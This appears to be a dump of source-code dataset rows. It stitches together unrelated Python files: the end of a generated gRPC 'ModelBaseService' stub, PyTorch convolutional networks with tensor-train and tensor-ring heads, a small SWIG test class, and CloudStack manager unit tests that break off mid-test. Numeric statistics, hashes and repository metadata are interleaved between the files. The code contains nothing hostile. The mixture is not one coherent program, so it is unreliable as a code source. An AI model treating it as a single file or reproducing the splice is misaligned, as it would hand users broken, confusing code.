"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteById(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Delete(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteList(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ForceDeleteList(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def UpdateById(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Update(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def UpdateDoc(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Insert(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Count(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_ModelBaseServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetById': grpc.unary_unary_rpc_method_handler(
servicer.GetById,
request_deserializer=entity_dot_request__pb2.Request.FromString,
response_serializer=entity_dot_response__pb2.Response.SerializeToString,
),
'Get': grpc.unary_unary_rpc_method_handler(
servicer.Get,
request_deserializer=entity_dot_request__pb2.Request.FromString,
response_serializer=entity_dot_response__pb2.Response.SerializeToString,
),
'GetList': grpc.unary_unary_rpc_method_handler(
servicer.GetList,
request_deserializer=entity_dot_request__pb2.Request.FromString,
response_serializer=entity_dot_response__pb2.Response.SerializeToString,
),
'DeleteById': grpc.unary_unary_rpc_method_handler(
servicer.DeleteById,
request_deserializer=entity_dot_request__pb2.Request.FromString,
response_serializer=entity_dot_response__pb2.Response.SerializeToString,
),
'Delete': grpc.unary_unary_rpc_method_handler(
servicer.Delete,
request_deserializer=entity_dot_request__pb2.Request.FromString,
response_serializer=entity_dot_response__pb2.Response.SerializeToString,
),
'DeleteList': grpc.unary_unary_rpc_method_handler(
servicer.DeleteList,
request_deserializer=entity_dot_request__pb2.Request.FromString,
response_serializer=entity_dot_response__pb2.Response.SerializeToString,
),
'ForceDeleteList': grpc.unary_unary_rpc_method_handler(
servicer.ForceDeleteList,
request_deserializer=entity_dot_request__pb2.Request.FromString,
response_serializer=entity_dot_response__pb2.Response.SerializeToString,
),
'UpdateById': grpc.unary_unary_rpc_method_handler(
servicer.UpdateById,
request_deserializer=entity_dot_request__pb2.Request.FromString,
response_serializer=entity_dot_response__pb2.Response.SerializeToString,
),
'Update': grpc.unary_unary_rpc_method_handler(
servicer.Update,
request_deserializer=entity_dot_request__pb2.Request.FromString,
response_serializer=entity_dot_response__pb2.Response.SerializeToString,
),
'UpdateDoc': grpc.unary_unary_rpc_method_handler(
servicer.UpdateDoc,
request_deserializer=entity_dot_request__pb2.Request.FromString,
response_serializer=entity_dot_response__pb2.Response.SerializeToString,
),
'Insert': grpc.unary_unary_rpc_method_handler(
servicer.Insert,
request_deserializer=entity_dot_request__pb2.Request.FromString,
response_serializer=entity_dot_response__pb2.Response.SerializeToString,
),
'Count': grpc.unary_unary_rpc_method_handler(
servicer.Count,
request_deserializer=entity_dot_request__pb2.Request.FromString,
response_serializer=entity_dot_response__pb2.Response.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'grpc.ModelBaseService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class ModelBaseService(object):
"""Missing associated documentation comment in .proto file."""
@staticmethod
def GetById(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/grpc.ModelBaseService/GetById',
entity_dot_request__pb2.Request.SerializeToString,
entity_dot_response__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Get(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/grpc.ModelBaseService/Get',
entity_dot_request__pb2.Request.SerializeToString,
entity_dot_response__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetList(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/grpc.ModelBaseService/GetList',
entity_dot_request__pb2.Request.SerializeToString,
entity_dot_response__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def DeleteById(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/grpc.ModelBaseService/DeleteById',
entity_dot_request__pb2.Request.SerializeToString,
entity_dot_response__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Delete(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/grpc.ModelBaseService/Delete',
entity_dot_request__pb2.Request.SerializeToString,
entity_dot_response__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def DeleteList(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/grpc.ModelBaseService/DeleteList',
entity_dot_request__pb2.Request.SerializeToString,
entity_dot_response__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ForceDeleteList(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/grpc.ModelBaseService/ForceDeleteList',
entity_dot_request__pb2.Request.SerializeToString,
entity_dot_response__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def UpdateById(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/grpc.ModelBaseService/UpdateById',
entity_dot_request__pb2.Request.SerializeToString,
entity_dot_response__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Update(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/grpc.ModelBaseService/Update',
entity_dot_request__pb2.Request.SerializeToString,
entity_dot_response__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def UpdateDoc(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/grpc.ModelBaseService/UpdateDoc',
entity_dot_request__pb2.Request.SerializeToString,
entity_dot_response__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Insert(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/grpc.ModelBaseService/Insert',
entity_dot_request__pb2.Request.SerializeToString,
entity_dot_response__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Count(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/grpc.ModelBaseService/Count',
entity_dot_request__pb2.Request.SerializeToString,
entity_dot_response__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
| 44.62645
| 103
| 0.651139
| 1,751
| 19,234
| 6.83438
| 0.058252
| 0.055653
| 0.049469
| 0.058745
| 0.89588
| 0.858778
| 0.858778
| 0.820674
| 0.816161
| 0.806635
| 0
| 0.005443
| 0.274098
| 19,234
| 430
| 104
| 44.730233
| 0.851669
| 0.056411
| 0
| 0.707775
| 1
| 0
| 0.078006
| 0.042191
| 0
| 0
| 0
| 0
| 0
| 1
| 0.069705
| false
| 0
| 0.008043
| 0.032172
| 0.117962
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
1dae48fac017f983c3a95d54ffd078199530d99c
| 6,506
|
py
|
Python
|
Nets/Net.py
|
AndresOtero/TensorDecompositionMachineLearning
|
455f16b405ec9d031999b0ebf9c5a68d3c20b233
|
[
"MIT"
] | 3
|
2021-06-11T02:46:06.000Z
|
2021-08-17T02:59:30.000Z
|
Nets/Net.py
|
AndresOtero/TensorDecompositionMachineLearning
|
455f16b405ec9d031999b0ebf9c5a68d3c20b233
|
[
"MIT"
] | null | null | null |
Nets/Net.py
|
AndresOtero/TensorDecompositionMachineLearning
|
455f16b405ec9d031999b0ebf9c5a68d3c20b233
|
[
"MIT"
] | null | null | null |
from __future__ import print_function
import torch.nn as nn
import torch.nn.functional as F
from Nets.TRNetShared import TRNetShared
from Nets.TTNetParallel import FeatureMap
from Nets.TTNetShared import TTNetShared
from Utils.TensorTools import flat_divisions, flat_divisions_with_batch
class FullyConnected(nn.Module):
def __init__(self, net_params):
super(FullyConnected, self).__init__()
self.amount_of_divisions = net_params.get_amount_of_divisions()
self.m = net_params.get_m()
self.n = net_params.get_n()
self.fc1 = FeatureMap(self.n, self.m, net_params.get_amount_of_divisions(), net_params.get_batch_size())
self.fc2 = nn.Linear(self.m * self.amount_of_divisions, 10)
def forward(self, x):
x = self.fc1(x)
x = x.view(-1, self.m * self.amount_of_divisions)
x = self.fc2(x)
return F.log_softmax(x, dim=1)
def get_number_of_parameters(self):
return sum([p.numel() for p in self.parameters() if p.requires_grad])
class ConvolutionalNet(nn.Module):
def __init__(self, net_params):
super(ConvolutionalNet, self).__init__()
self.conv_layer = nn.Sequential(
nn.Conv2d(in_channels=3, out_channels=32, kernel_size=3, padding=1),
nn.BatchNorm2d(32),
nn.ReLU(inplace=True),
nn.Conv2d(in_channels=32, out_channels=64, kernel_size=3, padding=1),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2),
nn.Dropout2d(p=0.5),
nn.Conv2d(in_channels=64, out_channels=128, kernel_size=3, padding=1),
nn.BatchNorm2d(128),
nn.ReLU(inplace=True),
nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, padding=1),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2),
nn.Dropout2d(p=0.05),
nn.Conv2d(in_channels=128, out_channels=256, kernel_size=3, padding=1),
nn.BatchNorm2d(256),
nn.ReLU(inplace=True),
nn.Conv2d(in_channels=256, out_channels=256, kernel_size=3, padding=1),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2),
)
self.fc_layer = nn.Sequential(
nn.Dropout(p=0.1),
nn.Linear(4096, 32),
nn.ReLU(inplace=True),
nn.Dropout(p=0.1),
nn.Linear(32, 10)
)
def forward(self, x):
x = self.conv_layer(x)
x = x.view(x.size(0), -1)
x = self.fc_layer(x)
return F.log_softmax(x, dim=1)
def get_number_of_parameters(self):
return sum([p.numel() for p in self.parameters() if p.requires_grad])
class ConvolutionalNetWithTT(nn.Module):
def __init__(self, net_params):
super(ConvolutionalNetWithTT, self).__init__()
self.conv_layer = nn.Sequential(
# Conv Layer block 1
nn.Conv2d(in_channels=3, out_channels=32, kernel_size=3, padding=1),
nn.BatchNorm2d(32),
nn.ReLU(inplace=True),
nn.Conv2d(in_channels=32, out_channels=64, kernel_size=3, padding=1),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2),
nn.Dropout2d(p=0.5),
# Conv Layer block 2
nn.Conv2d(in_channels=64, out_channels=128, kernel_size=3, padding=1),
nn.BatchNorm2d(128),
nn.ReLU(inplace=True),
nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, padding=1),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2),
nn.Dropout2d(p=0.05),
# Conv Layer block 3
nn.Conv2d(in_channels=128, out_channels=256, kernel_size=3, padding=1),
nn.BatchNorm2d(256),
nn.ReLU(inplace=True),
nn.Conv2d(in_channels=256, out_channels=256, kernel_size=3, padding=1),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2),
)
self.tt= TTNetShared(net_params)
self.row = net_params.get_divides_in_row()
self.col =net_params.get_divides_in_col()
self.divisions =net_params.get_amount_of_divisions()
self.n =net_params.get_n()
def forward(self, x):
batch_size, first_dim,second_dim,third_dim = x.size()
x1 = self.conv_layer(x)
x2 = x1.view(batch_size, self.divisions, self.n)
x3 = self.tt(x2)
return x3
def get_number_of_parameters(self):
return sum([p.numel() for p in self.parameters() if p.requires_grad])
class ConvolutionalNetWithTR(nn.Module):
def __init__(self, net_params):
super(ConvolutionalNetWithTR, self).__init__()
self.conv_layer = nn.Sequential(
# Conv Layer block 1
nn.Conv2d(in_channels=3, out_channels=32, kernel_size=3, padding=1),
nn.BatchNorm2d(32),
nn.ReLU(inplace=True),
nn.Conv2d(in_channels=32, out_channels=64, kernel_size=3, padding=1),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2),
nn.Dropout2d(p=0.5),
# Conv Layer block 2
nn.Conv2d(in_channels=64, out_channels=128, kernel_size=3, padding=1),
nn.BatchNorm2d(128),
nn.ReLU(inplace=True),
nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, padding=1),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2),
nn.Dropout2d(p=0.05),
# Conv Layer block 3
nn.Conv2d(in_channels=128, out_channels=256, kernel_size=3, padding=1),
nn.BatchNorm2d(256),
nn.ReLU(inplace=True),
nn.Conv2d(in_channels=256, out_channels=256, kernel_size=3, padding=1),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2),
)
self.tr = TRNetShared(net_params)
self.row = net_params.get_divides_in_row()
self.col = net_params.get_divides_in_col()
self.divisions = net_params.get_amount_of_divisions()
self.n = net_params.get_n()
def forward(self, x):
batch_size, first_dim, second_dim, third_dim = x.size()
x1 = self.conv_layer(x)
x2 = x1.view(batch_size, self.divisions, self.n)
x3 = self.tr(x2)
return x3
def get_number_of_parameters(self):
return sum([p.numel() for p in self.parameters() if p.requires_grad])
| 37.177143
| 112
| 0.614663
| 907
| 6,506
| 4.194046
| 0.110254
| 0.070978
| 0.064932
| 0.084911
| 0.851998
| 0.847266
| 0.810988
| 0.780231
| 0.73449
| 0.73449
| 0
| 0.055985
| 0.264218
| 6,506
| 174
| 113
| 37.390805
| 0.738667
| 0.017369
| 0
| 0.737226
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.087591
| false
| 0
| 0.051095
| 0.029197
| 0.226277
| 0.007299
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
383b4c3a22a788def8e76cf6acb0bbe84a51d977
| 420
|
py
|
Python
|
test_vectors/SLSV_selfTests/testDevice.py
|
command-paul/slsv-master
|
a703bfaa8031e18e3fb74d3f1f2f4544c75a73ef
|
[
"BSD-3-Clause"
] | null | null | null |
test_vectors/SLSV_selfTests/testDevice.py
|
command-paul/slsv-master
|
a703bfaa8031e18e3fb74d3f1f2f4544c75a73ef
|
[
"BSD-3-Clause"
] | null | null | null |
test_vectors/SLSV_selfTests/testDevice.py
|
command-paul/slsv-master
|
a703bfaa8031e18e3fb74d3f1f2f4544c75a73ef
|
[
"BSD-3-Clause"
] | 1
|
2021-01-29T14:29:52.000Z
|
2021-01-29T14:29:52.000Z
|
# Python tests for the SWIG wrapped device class
from SLSV_test import TestClass as _TestClass
class testDevice(_TestClass):
def setup(self):
return True
def test(self):
return True
def getResult(self):
return True
class testDeviceInterface(_TestClass):
def setup(self):
return True
def test(self):
return True
def getResult(self):
return True
| 20
| 48
| 0.657143
| 51
| 420
| 5.333333
| 0.431373
| 0.220588
| 0.308824
| 0.25
| 0.573529
| 0.573529
| 0.573529
| 0.573529
| 0.573529
| 0.573529
| 0
| 0
| 0.283333
| 420
| 20
| 49
| 21
| 0.903654
| 0.109524
| 0
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0.066667
| 0.4
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
384357854c9f6a57ccc025691cd3d09ad0d601c5
| 20,044
|
py
|
Python
|
tests/test_cloudstack_manager.py
|
tsuru/varnishapi
|
d63a8c8c5f9c837855509fc5af59d8213c1c91d6
|
[
"BSD-3-Clause"
] | 3
|
2015-05-04T03:20:09.000Z
|
2016-02-19T10:35:35.000Z
|
tests/test_cloudstack_manager.py
|
tsuru/varnishapi
|
d63a8c8c5f9c837855509fc5af59d8213c1c91d6
|
[
"BSD-3-Clause"
] | 3
|
2015-01-02T13:18:56.000Z
|
2021-02-08T20:17:14.000Z
|
tests/test_cloudstack_manager.py
|
tsuru/varnishapi
|
d63a8c8c5f9c837855509fc5af59d8213c1c91d6
|
[
"BSD-3-Clause"
] | 5
|
2015-01-02T13:11:45.000Z
|
2016-08-26T06:14:35.000Z
|
# Copyright 2014 varnishapi authors. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
import copy
import os
import unittest
import mock
from feaas import storage
from feaas.managers import cloudstack
class CloudStackManagerTestCase(unittest.TestCase):
def set_api_envs(self, url="http://cloudstackapi", api_key="key",
secret_key="secret"):
os.environ["CLOUDSTACK_API_URL"] = self.url = url
os.environ["CLOUDSTACK_API_KEY"] = self.api_key = api_key
os.environ["CLOUDSTACK_SECRET_KEY"] = self.secret_key = secret_key
def del_api_envs(self):
self._remove_envs("CLOUDSTACK_API_URL", "CLOUDSTACK_API_KEY",
"CLOUDSTACK_SECRET_KEY")
def set_vm_envs(self, template_id="abc123", zone_id="zone1",
service_offering_id="qwe123", project_id=None,
network_ids=None):
os.environ["CLOUDSTACK_TEMPLATE_ID"] = self.template_id = template_id
self.service_offering_id = service_offering_id
os.environ["CLOUDSTACK_SERVICE_OFFERING_ID"] = self.service_offering_id
os.environ["CLOUDSTACK_ZONE_ID"] = self.zone_id = zone_id
if project_id:
os.environ["CLOUDSTACK_PROJECT_ID"] = self.project_id = project_id
if network_ids:
os.environ["CLOUDSTACK_NETWORK_IDS"] = self.network_ids = network_ids
def del_vm_envs(self):
self._remove_envs("CLOUDSTACK_TEMPLATE_ID", "CLOUDSTACK_SERVICE_OFFERING_ID",
"CLOUDSTACK_ZONE_ID", "CLOUDSTACK_PROJECT_ID",
"CLOUDSTACK_NETWORK_IDS")
def _remove_envs(self, *envs):
for env in envs:
if env in os.environ:
del os.environ[env]
def test_init(self):
self.set_api_envs()
self.addCleanup(self.del_api_envs)
client = cloudstack.CloudStackManager(storage=None)
self.assertEqual(self.url, client.client.api_url)
self.assertEqual(self.api_key, client.client.api_key)
self.assertEqual(self.secret_key, client.client.secret)
def test_init_no_api_url(self):
with self.assertRaises(cloudstack.MissConfigurationError) as cm:
cloudstack.CloudStackManager(storage=None)
exc = cm.exception
self.assertEqual(("env var CLOUDSTACK_API_URL is required",),
exc.args)
def test_init_no_api_key(self):
os.environ["CLOUDSTACK_API_URL"] = "something"
with self.assertRaises(cloudstack.MissConfigurationError) as cm:
cloudstack.CloudStackManager(storage=None)
self.addCleanup(self.del_api_envs)
exc = cm.exception
self.assertEqual(("env var CLOUDSTACK_API_KEY is required",),
exc.args)
def test_init_no_secret_key(self):
os.environ["CLOUDSTACK_API_URL"] = "something"
os.environ["CLOUDSTACK_API_KEY"] = "not_secret"
with self.assertRaises(cloudstack.MissConfigurationError) as cm:
cloudstack.CloudStackManager(storage=None)
self.addCleanup(self.del_api_envs)
exc = cm.exception
self.assertEqual(("env var CLOUDSTACK_SECRET_KEY is required",),
exc.args)
@mock.patch("uuid.uuid4")
def test_start_instance(self, uuid):
self.set_api_envs()
self.addCleanup(self.del_api_envs)
self.set_vm_envs(project_id="project-123", network_ids="net-123")
self.addCleanup(self.del_vm_envs)
uuid.return_value = "uuid_val"
instance = storage.Instance(name="some_instance", units=[])
strg_mock = mock.Mock()
strg_mock.retrieve_instance.return_value = instance
client_mock = mock.Mock()
client_mock.deployVirtualMachine.return_value = {"id": "abc123",
"jobid": "qwe321"}
client_mock.queryAsyncJobResult.return_value = {"jobstatus": 1}
vm = {"id": "abc123", "nic": [{"ipaddress": "10.0.0.1"}]}
client_mock.listVirtualMachines.return_value = {"virtualmachine": [vm]}
client_mock.encode_user_data.return_value = user_data = mock.Mock()
manager = cloudstack.CloudStackManager(storage=strg_mock)
manager.client = client_mock
got_instance = manager.start_instance("some_instance")
self.assertEqual(instance, got_instance)
self.assertEqual(1, len(instance.units))
unit = instance.units[0]
self.assertEqual("abc123", unit.id)
self.assertEqual("uuid_val", unit.secret)
self.assertEqual(instance, unit.instance)
self.assertEqual("10.0.0.1", unit.dns_name)
self.assertEqual("creating", unit.state)
strg_mock.retrieve_instance.assert_called_with(name="some_instance")
create_data = {"group": "feaas", "templateid": self.template_id,
"zoneid": self.zone_id,
"serviceofferingid": self.service_offering_id,
"userdata": user_data, "networkids": self.network_ids,
"projectid": self.project_id}
client_mock.deployVirtualMachine.assert_called_with(create_data)
actual_user_data = manager.get_user_data("uuid_val")
client_mock.encode_user_data.assert_called_with(actual_user_data)
@mock.patch("uuid.uuid4")
def test_start_instance_no_project_id(self, uuid):
self.set_api_envs()
self.addCleanup(self.del_api_envs)
self.set_vm_envs(network_ids="net-123")
self.addCleanup(self.del_vm_envs)
uuid.return_value = "uuid_val"
instance = storage.Instance(name="some_instance", units=[])
strg_mock = mock.Mock()
strg_mock.retrieve_instance.return_value = instance
client_mock = mock.Mock()
client_mock.deployVirtualMachine.return_value = {"id": "abc123",
"jobid": "qwe321"}
client_mock.queryAsyncJobResult.return_value = {"jobstatus": 1}
vm = {"id": "abc123", "nic": [{"ipaddress": "10.0.0.1"}]}
client_mock.listVirtualMachines.return_value = {"virtualmachine": [vm]}
client_mock.encode_user_data.return_value = user_data = mock.Mock()
manager = cloudstack.CloudStackManager(storage=strg_mock)
manager.client = client_mock
got_instance = manager.start_instance("some_instance")
self.assertEqual(instance, got_instance)
self.assertEqual(1, len(instance.units))
unit = instance.units[0]
self.assertEqual("abc123", unit.id)
self.assertEqual("uuid_val", unit.secret)
self.assertEqual(instance, unit.instance)
self.assertEqual("10.0.0.1", unit.dns_name)
self.assertEqual("creating", unit.state)
strg_mock.retrieve_instance.assert_called_with(name="some_instance")
create_data = {"group": "feaas", "templateid": self.template_id,
"zoneid": self.zone_id,
"serviceofferingid": self.service_offering_id,
"userdata": user_data, "networkids": self.network_ids}
client_mock.deployVirtualMachine.assert_called_with(create_data)
actual_user_data = manager.get_user_data("uuid_val")
client_mock.encode_user_data.assert_called_with(actual_user_data)
@mock.patch("uuid.uuid4")
def test_start_instance_no_network_id(self, uuid):
self.set_api_envs()
self.addCleanup(self.del_api_envs)
self.set_vm_envs(project_id="proj-123")
self.addCleanup(self.del_vm_envs)
uuid.return_value = "uuid_val"
instance = storage.Instance(name="some_instance", units=[])
strg_mock = mock.Mock()
strg_mock.retrieve_instance.return_value = instance
client_mock = mock.Mock()
client_mock.deployVirtualMachine.return_value = {"id": "abc123",
"jobid": "qwe321"}
client_mock.queryAsyncJobResult.return_value = {"jobstatus": 1}
vm = {"id": "abc123", "nic": []}
client_mock.listVirtualMachines.return_value = {"virtualmachine": [vm]}
client_mock.encode_user_data.return_value = user_data = mock.Mock()
manager = cloudstack.CloudStackManager(storage=strg_mock)
manager.client = client_mock
got_instance = manager.start_instance("some_instance")
self.assertEqual(instance, got_instance)
self.assertEqual(1, len(instance.units))
unit = instance.units[0]
self.assertEqual("abc123", unit.id)
self.assertEqual("uuid_val", unit.secret)
self.assertEqual(instance, unit.instance)
self.assertEqual("", unit.dns_name)
self.assertEqual("creating", unit.state)
strg_mock.retrieve_instance.assert_called_with(name="some_instance")
create_data = {"group": "feaas", "templateid": self.template_id,
"zoneid": self.zone_id,
"serviceofferingid": self.service_offering_id,
"userdata": user_data, "projectid": self.project_id}
client_mock.deployVirtualMachine.assert_called_with(create_data)
actual_user_data = manager.get_user_data("uuid_val")
client_mock.encode_user_data.assert_called_with(actual_user_data)
@mock.patch("uuid.uuid4")
def test_start_instance_public_network_name(self, uuid):
def cleanup():
del os.environ["CLOUDSTACK_PUBLIC_NETWORK_NAME"]
self.addCleanup(cleanup)
os.environ["CLOUDSTACK_PUBLIC_NETWORK_NAME"] = "NOPOWER"
self.set_api_envs()
self.addCleanup(self.del_api_envs)
self.set_vm_envs(project_id="project-123", network_ids="net-123")
self.addCleanup(self.del_vm_envs)
uuid.return_value = "uuid_val"
instance = storage.Instance(name="some_instance", units=[])
strg_mock = mock.Mock()
strg_mock.retrieve_instance.return_value = instance
client_mock = mock.Mock()
client_mock.deployVirtualMachine.return_value = {"id": "abc123",
"jobid": "qwe321"}
client_mock.queryAsyncJobResult.return_value = {"jobstatus": 1}
vm = {"id": "abc123", "nic": [{"ipaddress": "10.0.0.1", "networkname": "POWERNET"},
{"ipaddress": "192.168.1.1", "networkname": "NOPOWER"},
{"ipaddress": "172.16.42.1", "networkname": "KPOWER"}]}
client_mock.listVirtualMachines.return_value = {"virtualmachine": [vm]}
client_mock.encode_user_data.return_value = user_data = mock.Mock()
manager = cloudstack.CloudStackManager(storage=strg_mock)
manager.client = client_mock
got_instance = manager.start_instance("some_instance")
self.assertEqual(instance, got_instance)
self.assertEqual(1, len(instance.units))
unit = instance.units[0]
self.assertEqual("abc123", unit.id)
self.assertEqual("uuid_val", unit.secret)
self.assertEqual(instance, unit.instance)
self.assertEqual("192.168.1.1", unit.dns_name)
self.assertEqual("creating", unit.state)
strg_mock.retrieve_instance.assert_called_with(name="some_instance")
create_data = {"group": "feaas", "templateid": self.template_id,
"zoneid": self.zone_id,
"serviceofferingid": self.service_offering_id,
"userdata": user_data, "networkids": self.network_ids,
"projectid": self.project_id}
client_mock.deployVirtualMachine.assert_called_with(create_data)
actual_user_data = manager.get_user_data("uuid_val")
client_mock.encode_user_data.assert_called_with(actual_user_data)
@mock.patch("uuid.uuid4")
def test_start_instance_multi_nic_no_network_name(self, uuid):
self.set_api_envs()
self.addCleanup(self.del_api_envs)
self.set_vm_envs(project_id="project-123", network_ids="net-123")
self.addCleanup(self.del_vm_envs)
uuid.return_value = "uuid_val"
instance = storage.Instance(name="some_instance", units=[])
strg_mock = mock.Mock()
strg_mock.retrieve_instance.return_value = instance
client_mock = mock.Mock()
client_mock.deployVirtualMachine.return_value = {"id": "abc123",
"jobid": "qwe321"}
client_mock.queryAsyncJobResult.return_value = {"jobstatus": 1}
vm = {"id": "abc123", "nic": [{"ipaddress": "10.0.0.1", "networkname": "POWERNET"},
{"ipaddress": "192.168.1.1", "networkname": "NOPOWER"},
{"ipaddress": "172.16.42.1", "networkname": "KPOWER"}]}
client_mock.listVirtualMachines.return_value = {"virtualmachine": [vm]}
client_mock.encode_user_data.return_value = user_data = mock.Mock()
manager = cloudstack.CloudStackManager(storage=strg_mock)
manager.client = client_mock
got_instance = manager.start_instance("some_instance")
self.assertEqual(instance, got_instance)
self.assertEqual(1, len(instance.units))
unit = instance.units[0]
self.assertEqual("abc123", unit.id)
